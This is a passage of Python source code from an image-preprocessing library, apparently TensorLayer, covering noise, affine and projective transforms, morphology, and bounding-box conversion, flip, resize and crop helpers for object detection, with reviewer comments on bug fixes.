        data = np.rollaxis(data, 0, channel_index + 1)
        results.append(data)
    return np.asarray(results)
# noise
def drop(x, keep=0.5):
    """Randomly set pixels to zero, keeping each with probability ``keep``.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel], [row, col] or [col] (a vector).
    keep : float
        The keeping probability (0, 1); the lower, the more values are zeroed.
        Note: for 3-channel images the input array is modified in place.

    Returns
    -------
    numpy.array
        A processed image. Raises for any other dimensionality.
    """
    if len(x.shape) == 3:
        if x.shape[-1] == 3:  # color: one shared mask across all three channels
            mask = np.random.binomial(n=1, p=keep, size=x.shape[:-1])
            for i in range(3):
                x[:, :, i] = np.multiply(x[:, :, i], mask)
        elif x.shape[-1] == 1:  # greyscale image with channel axis
            x = np.multiply(x, np.random.binomial(n=1, p=keep, size=x.shape))
        else:
            raise Exception("Unsupported shape {}".format(x.shape))
    elif len(x.shape) == 2 or len(x.shape) == 1:  # greyscale matrix (image) or vector
        # BUG FIX: was `len(x.shape) == 2 or 1`, which is always truthy and made
        # the `else` branch below unreachable for any input dimensionality.
        x = np.multiply(x, np.random.binomial(n=1, p=keep, size=x.shape))
    else:
        raise Exception("Unsupported shape {}".format(x.shape))
    return x
# x = np.asarray([[1,2,3,4,5,6,7,8,9,10],[1,2,3,4,5,6,7,8,9,10]])
# x = np.asarray([x,x,x,x,x,x])
# x.shape = 10, 4, 3
# tl.logging.info(x)
# # exit()
# tl.logging.info(x.shape)
# # exit()
# tl.logging.info(drop(x, keep=1.))
# exit()
# manual transform
def transform_matrix_offset_center(matrix, x, y):
    """Re-anchor a 3x3 transform matrix so it operates about the image center.

    Parameters
    ----------
    matrix : numpy.array
        Transform matrix.
    x and y : 2 int
        Size of image.

    Returns
    -------
    numpy.array
        The transform matrix.

    Examples
    --------
    - See ``tl.prepro.rotation``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
    """
    o_x = float(x) / 2 + 0.5
    o_y = float(y) / 2 + 0.5
    # translate to the center, apply the transform, translate back
    shift_to_center = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
    shift_back = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
    return np.dot(np.dot(shift_to_center, matrix), shift_back)
def apply_transform(x, transform_matrix, channel_index=2, fill_mode='nearest', cval=0., order=1):
    """Return the image transformed by ``transform_matrix`` (usually produced by
    ``transform_matrix_offset_center``).

    Parameters
    ----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    transform_matrix : numpy.array
        Transform matrix (offset center), can be generated by ``transform_matrix_offset_center``
    channel_index : int
        Index of channel, default 2.
    fill_mode : str
        Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.affine_transform.html>`__
    cval : float
        Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0
    order : int
        The order of interpolation, in the range 0-5 (0 nearest, 1 bi-linear (default),
        2 bi-quadratic, 3 bi-cubic, 4 bi-quartic, 5 bi-quintic).

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    --------
    - See ``tl.prepro.rotation``, ``tl.prepro.shift``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
    """
    x = np.rollaxis(x, channel_index, 0)  # channel-first so each plane is warped independently
    final_affine_matrix = transform_matrix[:2, :2]
    final_offset = transform_matrix[:2, 2]
    # FIX: call scipy.ndimage.affine_transform directly; the
    # scipy.ndimage.interpolation submodule was deprecated in SciPy 1.2 and has
    # been removed in recent SciPy releases.
    channel_images = [
        ndi.affine_transform(
            x_channel, final_affine_matrix, final_offset, order=order, mode=fill_mode, cval=cval
        ) for x_channel in x
    ]
    x = np.stack(channel_images, axis=0)
    x = np.rollaxis(x, 0, channel_index + 1)  # restore the original channel position
    return x
def projective_transform_by_points(
    x, src, dst, map_args=None, output_shape=None, order=1, mode='constant', cval=0.0, clip=True,
    preserve_range=False
):
    """Projective transform by given coordinates, usually 4 coordinates,
    see `scikit-image <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    src : list or numpy
        The original coordinates, usually 4 coordinates of (width, height).
    dst : list or numpy
        The coordinates after transformation; same number of coordinates as src.
    map_args : dictionary or None
        Keyword arguments passed to the inverse map.
    output_shape : tuple of 2 int
        Shape of the output image generated. By default the shape of the input image is preserved. Note that, even for multi-band images, only rows and columns need to be specified.
    order : int
        The order of interpolation, in the range 0-5 (0 nearest, 1 bi-linear (default),
        2 bi-quadratic, 3 bi-cubic, 4 bi-quartic, 5 bi-quintic).
    mode : str
        One of `constant` (default), `edge`, `symmetric`, `reflect` or `wrap`.
        Points outside the boundaries of the input are filled according to the given mode. Modes match the behaviour of numpy.pad.
    cval : float
        Used in conjunction with mode `constant`, the value outside the image boundaries.
    clip : boolean
        Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
    preserve_range : boolean
        Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    --------
    Assume X is an image from CIFAR-10, i.e. shape == (32, 32, 3)

    >>> src = [[0,0],[0,32],[32,0],[32,32]]     # [w, h]
    >>> dst = [[10,10],[0,32],[32,0],[32,32]]
    >>> x = tl.prepro.projective_transform_by_points(X, src, dst)

    References
    -----------
    - `scikit-image : geometric transformations <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__
    - `scikit-image : examples <http://scikit-image.org/docs/dev/auto_examples/index.html>`__
    """
    if map_args is None:
        map_args = {}

    # accept plain lists of coordinates
    if isinstance(src, list):
        src = np.array(src)
    if isinstance(dst, list):
        dst = np.array(dst)
    if np.max(x) > 1:  # skimage.transform.warp expects values within [0, 1]
        x = x / 255

    tform = transform.ProjectiveTransform()
    tform.estimate(dst, src)
    return transform.warp(
        x, tform, map_args=map_args, output_shape=output_shape, order=order, mode=mode, cval=cval,
        clip=clip, preserve_range=preserve_range
    )
# Numpy and PIL
def array_to_img(x, dim_ordering=(0, 1, 2), scale=True):
    """Converts a numpy array to a PIL image object (uint8 format).

    Parameters
    ----------
    x : numpy.array
        An image with dimension of 3 and channels of 1 or 3.
    dim_ordering : tuple of 3 int
        Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
    scale : boolean
        If True, converts image to [0, 255] from any range of value like [-1, 2]. Default is True.

    Returns
    -------
    PIL.image
        An image.

    References
    -----------
    `PIL Image.fromarray <http://pillow.readthedocs.io/en/3.1.x/reference/Image.html?highlight=fromarray>`__
    """
    x = x.transpose(dim_ordering)  # numpy transpose returns a *view* of the input

    if scale:
        # FIX: the previous in-place ops (`x += ...`, `x *= 255`) wrote through
        # the transposed view and silently corrupted the caller's array; use
        # out-of-place arithmetic instead.
        x = x + max(-np.min(x), 0)  # shift so the minimum is >= 0
        x_max = np.max(x)
        if x_max != 0:
            x = x / x_max
        x = x * 255

    if x.shape[2] == 3:
        # RGB
        return PIL.Image.fromarray(x.astype('uint8'), 'RGB')
    elif x.shape[2] == 1:
        # greyscale
        return PIL.Image.fromarray(x[:, :, 0].astype('uint8'), 'L')
    else:
        raise Exception('Unsupported channel number: ', x.shape[2])
def find_contours(x, level=0.8, fully_connected='low', positive_orientation='low'):
    """Find iso-valued contours in a 2D array for a given level value.

    Thin delegation to `skimage.measure.find_contours
    <http://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.find_contours>`__.

    Parameters
    ------------
    x : 2D ndarray of double.
        Input data in which to find contours.
    level : float
        Value along which to find contours in the array.
    fully_connected : str
        Either `low` or `high`. Indicates whether array elements below the given level
        value are to be considered fully-connected (and hence elements above the value
        will only be face connected), or vice-versa.
    positive_orientation : str
        Either `low` or `high`. Indicates whether the output contours will produce
        positively-oriented polygons around islands of low- or high-valued elements.
        If `low` then contours will wind counter-clockwise around elements below the
        iso-value, i.e. low-valued elements are always on the left of the contour.

    Returns
    --------
    list of (n,2)-ndarrays
        Each contour is an ndarray of shape (n, 2), consisting of n (row, column)
        coordinates along the contour.

    """
    contours = skimage.measure.find_contours(
        x,
        level,
        fully_connected=fully_connected,
        positive_orientation=positive_orientation,
    )
    return contours
def pt2map(list_points=None, size=(100, 100), val=1):
    """Inputs a list of points, return a 2D image.

    Parameters
    --------------
    list_points : list of 2 int
        [[x, y], [x, y]..] for point coordinates.
    size : tuple of 2 int
        (w, h) for output size.
    val : float or int
        For the contour value.

    Returns
    -------
    numpy.array
        An image.

    """
    if list_points is None:
        raise Exception("list_points : list of 2 int")
    i_m = np.zeros(size)
    if len(list_points) == 0:
        return i_m
    # NOTE(review): despite the docstring, the nested loop below iterates each
    # element of `list_points` and then indexes `x[0]` / `x[1]` — so each entry
    # must itself be a sequence of 2-element points (e.g. the (n, 2) contour
    # arrays returned by `find_contours`). A flat [[x, y], ...] list as
    # documented would raise a TypeError here — confirm intended input format.
    for xx in list_points:
        for x in xx:
            # tl.logging.info(x)
            # round each coordinate to the nearest integer pixel and mark it
            i_m[int(np.round(x[0]))][int(np.round(x[1]))] = val
    return i_m
def binary_dilation(x, radius=3):
    """Return fast binary morphological dilation of an image.

    Delegates to `skimage.morphology.binary_dilation
    <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_dilation>`__
    with a disk-shaped structuring element.

    Parameters
    -----------
    x : 2D array
        A binary image.
    radius : int
        For the radius of mask.

    Returns
    -------
    numpy.array
        A processed binary image.

    """
    structuring_element = disk(radius)
    return _binary_dilation(x, selem=structuring_element)
def dilation(x, radius=3):
    """Return greyscale morphological dilation of an image,
    see `skimage.morphology.dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.dilation>`__.

    Parameters
    -----------
    x : 2D array
        An greyscale image.
    radius : int
        For the radius of mask.

    Returns
    -------
    numpy.array
        A processed greyscale image.

    """
    mask = disk(radius)
    # BUG FIX: the original called `dilation(x, selem=mask)` — i.e. this very
    # function — causing unconditional infinite recursion. Delegate to
    # skimage's dilation (aliased `_dilation`, matching the sibling wrappers
    # `_binary_dilation`, `_binary_erosion` and `_erosion` used in this file).
    x = _dilation(x, selem=mask)
    return x
def binary_erosion(x, radius=3):
    """Return binary morphological erosion of an image.

    Delegates to `skimage.morphology.binary_erosion
    <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_erosion>`__
    with a disk-shaped structuring element.

    Parameters
    -----------
    x : 2D array
        A binary image.
    radius : int
        For the radius of mask.

    Returns
    -------
    numpy.array
        A processed binary image.

    """
    structuring_element = disk(radius)
    return _binary_erosion(x, selem=structuring_element)
def erosion(x, radius=3):
    """Return greyscale morphological erosion of an image.

    Delegates to `skimage.morphology.erosion
    <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.erosion>`__
    with a disk-shaped structuring element.

    Parameters
    -----------
    x : 2D array
        A greyscale image.
    radius : int
        For the radius of mask.

    Returns
    -------
    numpy.array
        A processed greyscale image.

    """
    structuring_element = disk(radius)
    return _erosion(x, selem=structuring_element)
def obj_box_coords_rescale(coords=None, shape=None):
    """Scale down a list of coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].

    Parameters
    ------------
    coords : list of list of 4 ints or None
        For coordinates of more than one images e.g. [[x, y, w, h], [x, y, w, h], ...].
    shape : list of 2 int or None
        [height, width].

    Returns
    -------
    list of list of 4 numbers
        A list of new bounding boxes.

    Examples
    ---------
    >>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
    >>> print(coords)
    [[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
    >>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
    >>> print(coords)
    [[0.3, 0.8, 0.5, 1.0]]
    >>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
    >>> print(coords)
    [[0.15, 0.4, 0.25, 0.5]]

    """
    if coords is None:
        coords = []
    if shape is None:
        shape = [100, 200]

    # float conversion keeps the divisions below true divisions on Python 2
    height = shape[0] * 1.0
    width = shape[1] * 1.0

    rescaled = []
    for box in coords:
        if len(box) != 4:
            raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
        # x and w scale by image width; y and h by image height
        rescaled.append([box[0] / width, box[1] / height, box[2] / width, box[3] / height])
    return rescaled
def obj_box_coord_rescale(coord=None, shape=None):
    """Scale down one coordinate from pixel unit to the ratio of image size i.e. in the range of [0, 1].
    It is the reverse process of ``obj_box_coord_scale_to_pixelunit``.

    Parameters
    ------------
    coord : list of 4 int or None
        One coordinate of one image e.g. [x, y, w, h].
    shape : list of 2 int or None
        For [height, width].

    Returns
    -------
    list of 4 numbers
        New bounding box.

    Examples
    ---------
    >>> coord = tl.prepro.obj_box_coord_rescale(coord=[30, 40, 50, 50], shape=[100, 100])
    [0.3, 0.4, 0.5, 0.5]

    """
    if coord is None:
        coord = []
    if shape is None:
        shape = [100, 200]

    if len(coord) != 4:
        raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

    # single-box version of obj_box_coords_rescale, inlined
    height = shape[0] * 1.0  # float for true division on Python 2
    width = shape[1] * 1.0
    return [coord[0] / width, coord[1] / height, coord[2] / width, coord[3] / height]
def obj_box_coord_scale_to_pixelunit(coord, shape=None):
    """Convert one coordinate [x, y, w (or x2), h (or y2)] in ratio format to image coordinate format.
    It is the reverse process of ``obj_box_coord_rescale``.

    Parameters
    -----------
    coord : list of 4 float
        One coordinate of one image [x, y, w (or x2), h (or y2)] in ratio format, i.e value range [0~1].
    shape : tuple of 2 or None
        For [height, width].

    Returns
    -------
    list of 4 numbers
        New bounding box.

    Examples
    ---------
    >>> x, y, x2, y2 = tl.prepro.obj_box_coord_scale_to_pixelunit([0.2, 0.3, 0.5, 0.7], shape=(100, 200, 3))
    [40, 30, 100, 70]

    """
    if shape is None:
        shape = [100, 100]

    # only the first two entries of shape are used, so a (h, w, c) tuple works too
    height, width = shape[0], shape[1]
    return [
        int(coord[0] * width),   # x (or x1)
        int(coord[1] * height),  # y (or y1)
        int(coord[2] * width),   # w (or x2)
        int(coord[3] * height),  # h (or y2)
    ]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
# tl.logging.info(coords)
# # [[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
# tl.logging.info(coords)
# # [[0.3, 0.8, 0.5, 1.0]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
# tl.logging.info(coords)
# # [[0.15, 0.4, 0.25, 0.5]]
# exit()
def obj_box_coord_centroid_to_upleft_butright(coord, to_int=False):
    """Convert one coordinate [x_center, y_center, w, h] to [x1, y1, x2, y2] in up-left and botton-right format.

    Parameters
    ------------
    coord : list of 4 int/float
        One coordinate.
    to_int : boolean
        Whether to convert output as integer.

    Returns
    -------
    list of 4 numbers
        New bounding box.

    Examples
    ---------
    >>> coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
    [20, 30, 40, 50]

    """
    if len(coord) != 4:
        raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

    cx, cy, box_w, box_h = coord
    # corner = centre minus half the extent; opposite corner = corner + extent
    left = cx - box_w / 2.
    top = cy - box_h / 2.
    right = left + box_w
    bottom = top + box_h

    result = [left, top, right, bottom]
    if to_int:
        result = [int(v) for v in result]
    return result
# coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
# tl.logging.info(coord) [20, 30, 40, 50]
# exit()
def obj_box_coord_upleft_butright_to_centroid(coord):
    """Convert one coordinate [x1, y1, x2, y2] to [x_center, y_center, w, h].
    It is the reverse process of ``obj_box_coord_centroid_to_upleft_butright``.

    Parameters
    ------------
    coord : list of 4 int/float
        One coordinate.

    Returns
    -------
    list of 4 numbers
        New bounding box.

    """
    if len(coord) != 4:
        raise AssertionError("coordinate should be 4 values : [x1, y1, x2, y2]")

    left, top, right, bottom = coord
    # extent is the corner difference; centre is corner plus half extent
    box_w = right - left
    box_h = bottom - top
    return [left + box_w / 2., top + box_h / 2., box_w, box_h]
def obj_box_coord_centroid_to_upleft(coord):
    """Convert one coordinate [x_center, y_center, w, h] to [x, y, w, h].
    It is the reverse process of ``obj_box_coord_upleft_to_centroid``.

    Parameters
    ------------
    coord : list of 4 int/float
        One coordinate.

    Returns
    -------
    list of 4 numbers
        New bounding box.

    """
    if len(coord) != 4:
        raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

    cx, cy, box_w, box_h = coord
    # up-left corner = centre minus half the extent; w and h are unchanged
    return [cx - box_w / 2., cy - box_h / 2., box_w, box_h]
def obj_box_coord_upleft_to_centroid(coord):
    """Convert one coordinate [x, y, w, h] to [x_center, y_center, w, h].
    It is the reverse process of ``obj_box_coord_centroid_to_upleft``.

    Parameters
    ------------
    coord : list of 4 int/float
        One coordinate.

    Returns
    -------
    list of 4 numbers
        New bounding box.

    """
    if len(coord) != 4:
        raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

    left, top, box_w, box_h = coord
    # centre = up-left corner plus half the extent; w and h are unchanged
    return [left + box_w / 2., top + box_h / 2., box_w, box_h]
def parse_darknet_ann_str_to_list(annotations):
    """Input string format of class, x, y, w, h, return list of list format.

    Lines that do not contain exactly 5 whitespace-separated fields are
    silently skipped.

    Parameters
    -----------
    annotations : str
        The annotations in darkent format "class, x, y, w, h ...." seperated by "\\n".

    Returns
    -------
    list of list of 4 numbers
        List of bounding box.

    """
    parsed = []
    for line in annotations.split("\n"):
        fields = line.split()
        if len(fields) != 5:
            continue
        # first field is the integer class ID, the rest are float box values
        parsed.append([int(fields[0])] + [float(v) for v in fields[1:]])
    return parsed
def parse_darknet_ann_list_to_cls_box(annotations):
    """Parse darknet annotation format into two lists for class and bounding box.

    Input list of [[class, x, y, w, h], ...], return two list of [class ...] and [[x, y, w, h], ...].

    Parameters
    ------------
    annotations : list of list
        A list of class and bounding boxes of images e.g. [[class, x, y, w, h], ...]

    Returns
    -------
    list of int
        List of class labels.
    list of list of 4 numbers
        List of bounding box.

    """
    # split each [class, x, y, w, h] row into its label and its box part
    labels = [row[0] for row in annotations]
    boxes = [row[1:] for row in annotations]
    return labels, boxes
def obj_box_horizontal_flip(im, coords=None, is_rescale=False, is_center=False, is_random=False):
    """Left-right flip the image and coordinates for object detection.

    Parameters
    ----------
    im : numpy.array
        An image with dimension of [row, col, channel] (default).
    coords : list of list of 4 int/float or None
        Coordinates [[x, y, w, h], [x, y, w, h], ...].
    is_rescale : boolean
        Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
    is_center : boolean
        Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
    is_random : boolean
        If True, randomly flip. Default is False.

    Returns
    -------
    numpy.array
        A processed image
    list of list of 4 numbers
        A list of new bounding boxes.

    Examples
    --------
    >>> im = np.zeros([80, 100]) # as an image with shape width=100, height=80
    >>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
    >>> print(coords)
    [[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
    >>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
    >>> print(coords)
    [[0.5, 0.4, 0.3, 0.3]]
    >>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
    >>> print(coords)
    [[80, 40, 30, 30]]
    >>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
    >>> print(coords)
    [[50, 40, 30, 30]]

    """
    if coords is None:
        coords = []

    def _mirror(image, boxes):
        # Flip the pixels, then mirror each box's x coordinate across the
        # vertical centre line; y, w and h are unchanged by a horizontal flip.
        image = flip_axis(image, axis=1, is_random=False)
        mirrored = []
        for box in boxes:
            if len(box) != 4:
                raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
            if is_rescale:
                # boxes are in [0, 1] ratio units, so the image "width" is 1
                new_x = 1. - box[0] if is_center else 1. - box[0] - box[2]
            else:
                # boxes are in pixel units
                new_x = image.shape[1] - box[0] if is_center else image.shape[1] - box[0] - box[2]
            mirrored.append([new_x, box[1], box[2], box[3]])
        return image, mirrored

    if is_random and np.random.uniform(-1, 1) <= 0:
        # the coin flip said "no flip this time"
        return im, coords
    return _mirror(im, coords)


obj_box_left_right_flip = obj_box_horizontal_flip
# im = np.zeros([80, 100]) # as an image with shape width=100, height=80
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[0.5, 0.4, 0.3, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[80, 40, 30, 30]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[50, 40, 30, 30]]
# exit()
def obj_box_imresize(im, coords=None, size=None, interp='bicubic', mode=None, is_rescale=False):
    """Resize an image, and compute the new bounding box coordinates.

    Parameters
    -------------
    im : numpy.array
        An image with dimension of [row, col, channel] (default).
    coords : list of list of 4 int/float or None
        Coordinates [[x, y, w, h], [x, y, w, h], ...]
    size interp and mode : args
        See ``tl.prepro.imresize``.
    is_rescale : boolean
        Set to True, if the input coordinates are rescaled to [0, 1], then return
        the original coordinates. Default is False.

    Returns
    -------
    numpy.array
        A processed image
    list of list of 4 numbers
        A list of new bounding boxes.

    Examples
    --------
    >>> im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
    >>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
    >>> print(coords)
    [[40, 80, 60, 60], [20, 40, 40, 40]]
    >>> im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
    >>> print(coords, im2.shape)
    [[0.2, 0.4, 0.3, 0.3]] (160, 200, 3)

    """
    if coords is None:
        coords = []
    if size is None:
        size = [100, 100]

    # original extents as floats so the scale factors use true division (py2)
    imh = im.shape[0] * 1.0
    imw = im.shape[1] * 1.0
    im = imresize(im, size=size, interp=interp, mode=mode)

    if is_rescale is not False:
        # ratio-format [0, 1] boxes are invariant under resizing
        return im, coords

    resized_boxes = []
    for box in coords:
        if len(box) != 4:
            raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
        resized_boxes.append([
            int(box[0] * (size[1] / imw)),  # x' = x * (imw'/imw)
            int(box[1] * (size[0] / imh)),  # y' = y * (imh'/imh)
            int(box[2] * (size[1] / imw)),  # w' = w * (imw'/imw)
            int(box[3] * (size[0] / imh)),  # h' = h * (imh'/imh)
        ])
    return im, resized_boxes
# im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
# tl.logging.info(coords)
# # [[40, 80, 60, 60], [20, 40, 40, 40]]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
# tl.logging.info(coords)
# # [20, 20, 30, 15]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
# tl.logging.info(coords)
# # [30, 30, 45, 22]
# im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
# tl.logging.info(coords, im2.shape)
# # [0.2, 0.4, 0.3, 0.3] (160, 200, 3)
# exit()
def obj_box_crop(
        im, classes=None, coords=None, wrg=100, hrg=100, is_rescale=False, is_center=False, is_random=False,
        thresh_wh=0.02, thresh_wh2=12.
):
    """Randomly or centrally crop an image, and compute the new bounding box coordinates.
    Objects outside the cropped image will be removed.

    Parameters
    -----------
    im : numpy.array
        An image with dimension of [row, col, channel] (default).
    classes : list of int or None
        Class IDs.
    coords : list of list of 4 int/float or None
        Coordinates [[x, y, w, h], [x, y, w, h], ...]
    wrg hrg and is_random : args
        See ``tl.prepro.crop``.
    is_rescale : boolean
        Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
    is_center : boolean, default False
        Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
    thresh_wh : float
        Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
    thresh_wh2 : float
        Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.

    Returns
    -------
    numpy.array
        A processed image
    list of int
        A list of classes
    list of list of 4 numbers
        A list of new bounding boxes.

    """
    if classes is None:
        classes = []
    if coords is None:
        coords = []

    h, w = im.shape[0], im.shape[1]

    # the crop window must be strictly smaller than the image in both axes
    if (h <= hrg) or (w <= wrg):
        raise AssertionError("The size of cropping should smaller than the original image")

    if is_random:
        # NOTE(review): the trailing `- 1` yields an offset of -1 when
        # uniform() returns exactly 0.0, which makes the slice below start at
        # a negative index; presumably `int(np.random.uniform(0, h - hrg))`
        # was intended — confirm.
        h_offset = int(np.random.uniform(0, h - hrg) - 1)
        w_offset = int(np.random.uniform(0, w - wrg) - 1)
        h_end = hrg + h_offset
        w_end = wrg + w_offset
        im_new = im[h_offset:h_end, w_offset:w_end]
    else: # central crop
        h_offset = int(np.floor((h - hrg) / 2.))
        w_offset = int(np.floor((w - wrg) / 2.))
        h_end = h_offset + hrg
        w_end = w_offset + wrg
        im_new = im[h_offset:h_end, w_offset:w_end]

    #          w
    #   _____________________________
    #   |  h/w offset               |
    #   |       -------             |
    # h |       |     |             |
    #   |       |     |             |
    #   |       -------             |
    #   |            h/w end        |
    #   |___________________________|

    def _get_coord(coord):
        """Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
        before getting the new coordinates.
        Boxes outsides the cropped image will be removed.

        """
        if is_center:
            # normalise to up-left format so the clipping below is uniform
            coord = obj_box_coord_centroid_to_upleft(coord)

        ##======= pixel unit format and upleft, w, h ==========##
        # x = np.clip( coord[0] - w_offset, 0, w_end - w_offset)
        # y = np.clip( coord[1] - h_offset, 0, h_end - h_offset)
        # w = np.clip( coord[2] , 0, w_end - w_offset)
        # h = np.clip( coord[3] , 0, h_end - h_offset)

        # translate the box into the crop window's coordinate system
        x = coord[0] - w_offset
        y = coord[1] - h_offset
        w = coord[2]
        h = coord[3]

        if x < 0:
            if x + w <= 0:
                return None  # box lies entirely left of the crop window
            w = w + x  # clip the part that fell off the left edge
            x = 0
        elif x > im_new.shape[1]:  # object outside the cropped image
            return None

        if y < 0:
            if y + h <= 0:
                return None  # box lies entirely above the crop window
            h = h + y  # clip the part that fell off the top edge
            y = 0
        elif y > im_new.shape[0]:  # object outside the cropped image
            return None

        if (x is not None) and (x + w > im_new.shape[1]):  # box outside the cropped image
            w = im_new.shape[1] - x

        if (y is not None) and (y + h > im_new.shape[0]):  # box outside the cropped image
            h = im_new.shape[0] - y

        # drop degenerate boxes: extreme aspect ratio ...
        if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2):  # object shape strange: too narrow
            # tl.logging.info('xx', w, h)
            return None

        # ... or too small relative to the cropped image
        if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
                                                        thresh_wh):  # object shape strange: too narrow
            # tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
            return None

        coord = [x, y, w, h]

        ## convert back if input format is center.
        if is_center:
            coord = obj_box_coord_upleft_to_centroid(coord)

        return coord

    coords_new = list()
    classes_new = list()
    for i, _ in enumerate(coords):
        coord = coords[i]

        if len(coord) != 4:
            raise AssertionError("coordinate should be 4 values : [x, y, w, h]")

        if is_rescale:
            # for scaled coord, upscaled before process and scale back in the end.
            coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
            coord = _get_coord(coord)
            if coord is not None:
                coord = obj_box_coord_rescale(coord, im_new.shape)
                coords_new.append(coord)
                classes_new.append(classes[i])
        else:
            coord = _get_coord(coord)
            if coord is not None:
                coords_new.append(coord)
                classes_new.append(classes[i])
    return im_new, classes_new, coords_new
def obj_box_shift(
        im, classes=None, coords=None, wrg=0.1, hrg=0.1, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
        cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
    """Shift an image randomly or non-randomly, and compute the new bounding box coordinates.
    Objects outside the cropped image will be removed.

    Parameters
    -----------
    im : numpy.array
        An image with dimension of [row, col, channel] (default).
    classes : list of int or None
        Class IDs.
    coords : list of list of 4 int/float or None
        Coordinates [[x, y, w, h], [x, y, w, h], ...]
    wrg, hrg row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.shift``.
    is_rescale : boolean
        Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
    is_center : boolean
        Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
    thresh_wh : float
        Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
